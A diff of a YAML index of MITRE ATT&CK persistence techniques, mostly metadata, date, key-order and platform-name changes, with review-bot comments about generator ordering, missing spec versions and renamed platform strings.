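Review bot: the `bencane blog bashrc` reference for T1546.004 is a genuine content change inside an otherwise reordered `external_references` list: its `url` moves to a `web.archive.org` snapshot and the retrieval date becomes `September 25, 2024`, which is also the object's new `modified` date. Pointing at an archived copy is the right fix for a dead link, but please call it out in the PR description so readers do not dismiss the whole hunk as key-order churn. Note also that every reference here now lists `description` before `url`, the reverse of the removed lines, which is another generator ordering change.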
@@ -34877,7 +35286,7 @@ persistence:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -34900,12 +35309,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -34983,41 +35391,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1137.004:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
- type: attack-pattern
- created: '2019-11-07T20:09:56.536Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.004
- url: https://attack.mitre.org/techniques/T1137/004
- - source_name: SensePost Outlook Home Page
- url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
- description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
- Ruler Vector. Retrieved February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:13.742Z'
name: 'Office Application Startup: Outlook Home Page'
description: |
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -35026,27 +35404,54 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+ created: '2019-11-07T20:09:56.536Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/004
+ external_id: T1137.004
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Home Page
+ description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+ Ruler Vector. Retrieved February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.004
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -35107,7 +35512,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -35151,7 +35555,7 @@ persistence:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -35173,7 +35577,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -35254,7 +35657,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -35277,7 +35679,7 @@ persistence:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -35307,12 +35709,10 @@ persistence:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
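Review bot: T1037.003 loses `x_mitre_attack_spec_version: 2.1.0` together with `spec_version: '2.1'` in this hunk, and T1037.001 loses the same pair later in the file, which leaves these two objects with no ATT&CK spec version at all while the neighbouring objects keep `x_mitre_attack_spec_version: 3.1.0` or `3.2.0`. Combined with their `modified` values falling back to 2020-03-24, this looks like the generator is taking the two logon-script objects from an older source than the rest; check that the new data source actually carries current copies of T1037.001 and T1037.003 rather than merging stale ones.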
@@ -35402,12 +35802,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -35492,7 +35891,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -35557,18 +35955,17 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -35601,10 +35998,9 @@ persistence:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
@@ -35641,7 +36037,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.001:
technique:
@@ -35715,7 +36110,7 @@ persistence:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -35743,12 +36138,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1505:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T21:18:29.349Z'
name: Server Software Component
description: 'Adversaries may abuse legitimate extensible development features
of servers to establish persistent access to systems. Enterprise server applications
@@ -35807,33 +36201,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -35854,6 +36225,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -35868,52 +36240,42 @@ persistence:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
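Review bot: almost all of this hunk is key reordering rather than content change, which buries the substantive edits to T1556.001: the block removed in the previous hunk (`id`, `type`, `created`, `external_references`, `object_marking_refs`, `x_mitre_platforms`, `x_mitre_domains`) comes back here in a different order, and the real changes are `x_mitre_version` 2.0 to 2.1, `x_mitre_attack_spec_version` 2.1.0 to 3.2.0, the added `revoked: false`, and the removal of `x_mitre_permissions_required` (`- Administrator`). Have the generator emit keys in a fixed order (sorted, or the order of the upstream STIX object) so that future regenerations produce reviewable diffs.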
@@ -35935,6 +36297,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -35945,23 +36308,50 @@ persistence:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
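Review bot: `x_mitre_permissions_required` (`- User`, `- Administrator`) is removed from T1556.005 in this hunk, as it was from T1556.001 in the hunk before, and nothing replaces it, so any index consumer that filters techniques by required privilege level will silently get no match for these two entries. If the removal is inherited from upstream ATT&CK, say so in the PR description; if it is a generator omission, restore the field.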
@@ -35978,7 +36368,7 @@ persistence:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -36037,7 +36427,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -36119,7 +36508,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1543.002:
@@ -36234,12 +36622,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1136:
technique:
- modified: '2024-01-31T20:46:43.215Z'
+ modified: '2024-10-15T15:53:21.895Z'
name: Create Account
description: |-
Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -36262,16 +36649,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- Network
- Containers
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
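Review bot: any tooling that selects entries by the platform strings `Azure AD`, `Office 365` or `Google Workspace` will now match nothing, because this hunk replaces them on T1136 with `Office Suite` and `Identity Provider`, and the same rename is applied to T1556.009, T1098.002, T1137.002, T1078.004 and T1556 in their own hunks. The per-platform index generation and any downstream filters need the new names; a one-line old-to-new platform mapping in the PR description would also make the `x_mitre_version` bump from 2.4 to 2.5 easier to audit.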
@@ -36298,7 +36684,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.013:
technique:
@@ -36367,7 +36752,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.007:
technique:
@@ -36403,7 +36787,7 @@ persistence:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -36422,12 +36806,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -36477,12 +36860,11 @@ persistence:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -36515,9 +36897,10 @@ persistence:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
@@ -36534,9 +36917,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
@@ -36582,12 +36964,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1653:
technique:
- modified: '2023-09-30T21:28:45.038Z'
+ modified: '2024-10-16T20:11:40.334Z'
name: Power Settings
description: |-
Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -36601,7 +36982,7 @@ persistence:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Juan Tapiador
x_mitre_deprecated: false
x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -36660,7 +37041,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.001:
technique:
@@ -36686,7 +37066,7 @@ persistence:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -36712,13 +37092,11 @@ persistence:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1137.002:
technique:
